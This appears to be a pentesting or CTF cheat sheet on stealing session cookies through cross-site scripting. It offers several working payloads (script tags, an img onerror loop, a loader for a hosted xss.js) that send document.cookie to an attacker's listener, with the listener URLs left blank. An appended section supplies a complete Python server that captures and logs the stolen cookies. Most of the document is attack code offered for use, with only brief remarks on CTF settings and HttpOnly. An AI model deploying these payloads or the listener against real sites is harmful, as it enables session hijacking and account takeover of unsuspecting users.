Stealing Cookies

Stealing session cookies to hijack an authenticated session is one of the most common goals when exploiting a cross-site scripting (XSS) vulnerability. Keep in mind that only cookies set without the HttpOnly flag are readable through document.cookie; an HttpOnly session cookie cannot be exfiltrated with the payloads below, even though the XSS itself is still exploitable.


Verification with alert()

This payload pops an alert() box before sending the cookie. That is useful when testing a cross-site scripting payload, because the alert confirms that the payload runs in the victim's browser and shows exactly which cookie string it is reading. Once the alert() box is dismissed, the cookie is sent to the attacker-controlled server whose URL goes inside the empty quotes:

<script>alert(document.cookie);var i=new Image;i.src=""+document.cookie;</script>

Exfiltrating cookies without alert()

After verifying that the parameter is vulnerable to cross-site scripting, the following payload exfiltrates the cookie silently. The empty quotes are where the URL of your listener goes; the browser requests that URL with document.cookie appended, so the cookie arrives in the request path:

<script>var i=new Image;i.src=""+document.cookie;</script>

CTF Only Payload

The following payload uses an img tag rather than script. Because the listener does not return a valid image, the onerror handler fires again after every load, so the browser keeps resending the cookie in a loop and fills up your server with copies of it. I have found this can be life-saving in a CTF when things are not working as the author originally intended:

<img src=x onerror=this.src=''+document.cookie;>

My Preferred Method

The way I prefer to capture cookies is to submit one of the following payloads, which call back to a JavaScript file that I host on a Python web server (the src value is the URL of that file; the second variant first closes the attribute and tag the input is reflected into):

<script src=""></script>
"><script src=></script>

The xss.js file looks like the following; it does the same thing as the payloads above, grabbing the cookie and sending it to my web server (again, the listener URL goes inside the empty quotes):

// Exfiltrate document.cookie by loading it as an image from the attacker's server.
function pwn() {
    var img = document.createElement("img");
    img.src = "" + document.cookie;
}
pwn();

Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or a Burp Collaborator instance you control. Sending another user's session cookies to a third-party website you do not control is a bad idea. That said, sites such as requestbin exist if you want to send the request there:

<script>new Image().src=""+document.cookie;</script>
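As an added example (not code from the original page), here is the kind of local listener the text recommends, written with Python's standard library. It assumes the payloads above point at http://<your-host>:8000/?c= followed by document.cookie; the host, the port and the c query parameter name are assumptions for the example. The handler parses the cookie string out of the request path, logs it with the source address, and answers with a 1x1 GIF so the Image()/img load succeeds and the browser does not keep retrying.

```python
"""Minimal cookie-capture listener for an XSS payload that loads
http://<listener>:8000/?c=<document.cookie> as an image.

Added example; not the original page's code. Host, port and the
'c' parameter name are assumptions for the example.
"""
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# A 1x1 transparent GIF. Returning a real image means the <img>/Image()
# load succeeds, so an onerror handler does not fire again. If you want
# the CTF "onerror loop" behaviour from the text, return anything that
# is not an image instead.
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
         b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def extract_cookie(path: str) -> dict:
    """Return {name: value} for the cookie string carried in the ?c= parameter.

    Everything after "c=" is taken verbatim and percent-decoded, so both a
    raw document.cookie value (which contains ";" and "=") and an
    encodeURIComponent()-encoded one are handled without being split on
    the wrong separator.
    """
    query = urlsplit(path).query
    marker = "c="
    idx = query.find(marker)
    if idx == -1:
        return {}
    raw = unquote(query[idx + len(marker):])
    cookies = {}
    for part in raw.split(";"):
        part = part.strip()
        if "=" in part:
            # Split on the first "=" only; cookie values may contain "=".
            name, _, value = part.partition("=")
            cookies[name] = value
    return cookies


class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = extract_cookie(self.path)
        if cookies:
            logging.info("cookie from %s: %s", self.client_address[0], cookies)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

    def log_message(self, fmt, *args):
        # Silence the default per-request line; the cookie log line is what matters.
        pass


def serve(host: str = "0.0.0.0", port: int = 8000) -> None:
    """Run the listener until interrupted (assumed host/port)."""
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
    HTTPServer((host, port), CaptureHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Run it with `python3 listener.py` and point the payload's URL at `http://<your-host>:8000/?c=` followed by `document.cookie`; captured cookies are logged one line per request. Bind it to a host only your target can reach and stop it when the test is over, since it will happily log whatever anyone sends it.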
